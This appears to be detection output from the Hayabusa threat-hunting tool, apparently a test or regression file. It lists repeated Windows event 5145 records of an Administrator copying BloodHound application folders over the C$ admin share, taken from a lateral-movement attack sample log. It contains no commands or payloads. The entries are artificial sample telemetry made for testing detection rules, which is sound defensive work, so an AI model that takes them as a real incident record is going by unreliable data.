+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
